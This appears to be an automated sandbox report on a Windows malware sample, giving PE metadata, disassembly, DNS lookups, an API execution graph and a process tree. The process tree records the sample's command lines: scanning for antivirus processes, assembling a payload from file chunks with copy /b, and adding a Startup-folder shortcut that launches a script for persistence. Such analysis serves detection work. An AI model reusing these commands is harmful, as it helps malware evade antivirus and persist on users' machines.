                                              Subsystem Version Minor:0
                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                              Signature Valid:
                                              Signature Issuer:
                                              Signature Validation Error:
                                              Error Number:
                                              Not Before, Not After
                                                Subject Chain
                                                  Version:
                                                  Thumbprint MD5:
                                                  Thumbprint SHA-1:
                                                  Thumbprint SHA-256:
                                                  Serial:
                                                  Instruction
                                                  sub esp, 000002D4h
                                                  push ebx
                                                  push ebp
                                                  push esi
                                                  push edi
                                                  push 00000020h
                                                  xor ebp, ebp
                                                  pop esi
                                                  mov dword ptr [esp+18h], ebp
                                                  mov dword ptr [esp+10h], 00409268h
                                                  mov dword ptr [esp+14h], ebp
                                                  call dword ptr [00408030h]
                                                  push 00008001h
                                                  call dword ptr [004080B4h]
                                                  push ebp
                                                  call dword ptr [004082C0h]
                                                  push 00000008h
                                                  mov dword ptr [00472EB8h], eax
                                                  call 00007FD26480318Bh
                                                  push ebp
                                                  push 000002B4h
                                                  mov dword ptr [00472DD0h], eax
                                                  lea eax, dword ptr [esp+38h]
                                                  push eax
                                                  push ebp
                                                  push 00409264h
                                                  call dword ptr [00408184h]
                                                  push 0040924Ch
                                                  push 0046ADC0h
                                                  call 00007FD264802E6Dh
                                                  call dword ptr [004080B0h]
                                                  push eax
                                                  mov edi, 004C30A0h
                                                  push edi
                                                  call 00007FD264802E5Bh
                                                  push ebp
                                                  call dword ptr [00408134h]
                                                  cmp word ptr [004C30A0h], 0022h
                                                  mov dword ptr [00472DD8h], eax
                                                  mov eax, edi
                                                  jne 00007FD26480075Ah
                                                  push 00000022h
                                                  pop esi
                                                  mov eax, 004C30A2h
                                                  push esi
                                                  push eax
                                                  call 00007FD264802B31h
                                                  push eax
                                                  call dword ptr [00408260h]
                                                  mov esi, eax
                                                  mov dword ptr [esp+1Ch], esi
                                                  jmp 00007FD2648007E3h
                                                  push 00000020h
                                                  pop ebx
                                                  cmp ax, bx
                                                  jne 00007FD26480075Ah
                                                  add esi, 02h
                                                  cmp word ptr [esi], bx
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x2f3a.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x191be70x2868
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xf40000x2f3a0x3000c15fab2d5ae919ed0bc47dbc7b92bcf1False0.5292154947916666data5.37146345911248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xf70000xf320x1000c37dbd85adbacba5815fd64300b19e35False0.5908203125data5.4190090723243225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xf41d80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5450569568755086
                                                  RT_DIALOG0xf68400x100dataEnglishUnited States0.5234375
                                                  RT_DIALOG0xf69400x11cdataEnglishUnited States0.6056338028169014
                                                  RT_DIALOG0xf6a5c0x60dataEnglishUnited States0.7291666666666666
                                                  RT_GROUP_ICON0xf6abc0x14dataEnglishUnited States1.1
                                                  RT_VERSION0xf6ad00x194OpenPGP Secret KeyEnglishUnited States0.5693069306930693
                                                  RT_MANIFEST0xf6c640x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                  DLLImport
                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 18, 2024 14:51:05.298547983 CET5995953192.168.2.61.1.1.1
                                                  Dec 18, 2024 14:51:05.436534882 CET53599591.1.1.1192.168.2.6
                                                  Dec 18, 2024 14:51:19.427958965 CET5657253192.168.2.61.1.1.1
                                                  Dec 18, 2024 14:51:19.565439939 CET53565721.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 18, 2024 14:51:05.298547983 CET192.168.2.61.1.1.10xb97cStandard query (0)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqA (IP address)IN (0x0001)false
                                                  Dec 18, 2024 14:51:19.427958965 CET192.168.2.61.1.1.10x9815Standard query (0)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 18, 2024 14:51:05.436534882 CET1.1.1.1192.168.2.60xb97cName error (3)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqnonenoneA (IP address)IN (0x0001)false
                                                  Dec 18, 2024 14:51:19.565439939 CET1.1.1.1192.168.2.60x9815Name error (3)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqnonenoneA (IP address)IN (0x0001)false

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:08:50:57
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\Desktop\ldqj18tn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\ldqj18tn.exe"
                                                  Imagebase:0x400000
                                                  File size:1'656'911 bytes
                                                  MD5 hash:574AB8397D011243CB52BEF069BAD2DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:08:51:00
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:51:00
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:08:51:01
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x550000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:08:51:01
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /I "wrsa opssvc"
                                                  Imagebase:0xd90000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:08:51:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x550000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:08:51:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                  Imagebase:0xd90000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c md 704579
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /V "MARTNMSPIDERRINGTONE" Mh
                                                  Imagebase:0xd90000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                  Wow64 process (32bit):true
                                                  Commandline:Organizational.pif u
                                                  Imagebase:0xef0000
                                                  File size:893'608 bytes
                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 8%, ReversingLabs
                                                  Has exited:false

                                                  Target ID:12
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:choice /d y /t 5
                                                  Imagebase:0xea0000
                                                  File size:28'160 bytes
                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:08:51:04
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:08:51:04
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:08:51:15
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
                                                  Imagebase:0x7ff7b4620000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:08:51:15
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
                                                  Imagebase:0xd70000
                                                  File size:893'608 bytes
                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 8%, ReversingLabs
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:17.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:20.7%
                                                    Total number of Nodes:1526
                                                    Total number of Limit Nodes:33
                                                    execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 